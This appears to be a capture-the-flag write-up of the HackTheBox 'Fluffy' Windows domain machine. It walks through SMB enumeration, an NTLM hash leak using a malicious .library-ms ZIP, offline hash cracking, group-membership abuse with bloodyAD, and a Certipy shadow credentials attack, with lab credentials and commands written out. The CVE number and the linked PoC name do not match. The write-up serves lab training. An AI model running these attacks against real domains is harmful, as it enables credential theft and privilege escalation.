HackTheBox Fluffy Writeup
Machine Information
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
Nmap Scan
1
sudo nmap 10.10.11.69 -T4 -A -open -p-
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-21 04:05:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-21T04:06:58+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-21T04:06:56+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-07-21T04:06:58+00:00; +6h59m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-21T04:06:56+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49727/tcp open msrpc Microsoft Windows RPC
49750/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-21T04:06:17
|_ start_date: N/A
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 170.58 ms 10.10.16.1
2 170.95 ms 10.10.11.69
We get some important data about target:
SMB
So i started by testing the SMB port using the initial credentials:
1
nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
Then we expanded and downloaded everything using:
1
nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' -M spider_plus -o DOWNLOAD_FLAG=True
Checked the downloaded SMB files and found a PDF called Upgrade_Notice.pdf looked suspicious from the IT department listing CVEs affecting the current Windows version. One of them, CVE-2025-24996 (NTLM File Path Spoofing), has a working PoC on GitHub. 
CVE-2025-24996: NTLM Hash Leak via .library-ms File
the link of POC: https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom
Let’s start exploiting it.
After following the steps in the PoC:
- Loaded the Metasploit module
- Set the attacker IP, filename, library name, and SMB share
- Ran the module and generated the malicious ZIP file
(exploit.zip)
Once the victim extracts the ZIP, Windows Explorer automatically processes the embedded .library-ms file. This triggers a connection attempt to the attacker’s SMB server, resulting in NTLMv2 hash leakage.
You should see an output similar to the following: 
This hash can now be cracked offline using tools like hashcat or john to recover the user’s cleartext password.
1
hashcat -m 5600 -a 0 ntlmv2.txt /home/kali/Downloads/rockyou.txt
now you have credentials of user target P.AGILA:prometheusx-303
BloodHound
I used the credentials for p.agila@fluffy.htb and analyzed them with BloodHound.
1
bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -ns 10.10.11.69 -c All --zip
I found that this user is part of the SERVICE ACCOUNT MANAGERS group, which has GenericAll privileges over the SERVICE ACCOUNTS group. This means full control i can add or remove users, and modify settings for that group. 
let’s see what we got, SERVICE ACCOUNTS contains key accounts such as:
- WINRM_SVC@FLUFFY.HTB
- LDAP_SVC@FLUFFY.HTB
- CA_SVC@FLUFFY.HTB
If we see the user CA_SVC, it’s likely related to Certificate Services, and it may open a path to Active Directory Certificate Services (AD CS) exploitation.
This gives p.agila the ability to modify attributes of ca_svc, a critical step for Shadow Credentials or Other attacks related to Certificate Services.
1
bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila
By adding p.agila to SERVICE ACCOUNTS, I can potentially escalate privileges and gain further control through these service accounts. 
Now we are p.agila added to SERVICE ACCOUNTS what next step???
After some research, I discovered that the attack path involves Active Directory Certificate Services (AD CS) exploitation am one pf this attacks called To better understand this technique, I referenced this detailed blog:
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally
https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6
Shadow Credentials → $User
The old tool certipy-ad is outdated, so I used the updated and maintained Certipy tool instead https://github.com/ly4k/Certipy don’t mix between them
1
certipy shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'WINRM_SVC' auto
The KRB_AP_ERR_SKEW error occurs because your machine’s clock is out of sync with the Domain Controller 10.10.11.69, breaking Kerberos authentication for the Shadow Credentials attack. Fix it by syncing time with sudo ntpdate 10.10.11.69
Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great) It means your machine’s clock is out of sync with the domain controller and Kerberos hates that. Fix it with:
1
2
3
bashCopyEditsudo systemctl stop systemd-timesyncd
sudo ntpdate 10.10.11.69
This stops the system time service and manually syncs your clock with the DC (10.10.11.69), so you can get Kerberos tickets properly again.